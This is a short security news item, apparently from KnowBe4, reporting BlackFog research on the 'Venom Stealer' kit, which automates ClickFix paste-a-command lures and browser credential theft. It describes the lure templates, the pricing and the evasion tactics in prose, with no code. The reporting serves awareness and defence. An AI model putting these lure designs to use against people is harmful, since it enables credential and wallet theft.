A new commodity phishing kit called “Venom Stealer” allows threat actors to automate ClickFix attacks, according to researchers at BlackFog. ClickFix is a social engineering technique that tricks users into executing malicious commands on their computer, usually resulting in malware installation.
“Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting,” BlackFog explains. “It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running. The developer, operating under the handle ‘VenomStealer,’ sells access as a subscription ($250/month to $1,800 lifetime) with a vetted application process, Telegram-based licensing, and a 15% affiliate program.”
ClickFix attacks are more likely to evade detection by security tools because the malicious action is user-initiated.
“The infection begins when a target lands on a ClickFix page hosted by the operator,” the researchers write. “Venom ships four templates per platform (Windows and macOS): a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, paste a command, and press Enter. Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships.”
As soon as the malware is installed, it instantly scans the machine for sensitive information and immediately sends it to the attackers.
“The moment the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile. Chrome’s v10 and v20 password encryption is bypassed using a silent privilege escalation that extracts the decryption key without triggering any UAC dialog, leaving no forensic artifacts. System fingerprinting and browser extension inventories are captured alongside the credentials, giving cybercriminals a complete profile of each target.”
KnowBe4 enables your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.
BlackFog has the story: Venom Stealer Turns ClickFix Into a Full Exfiltration Pipeline
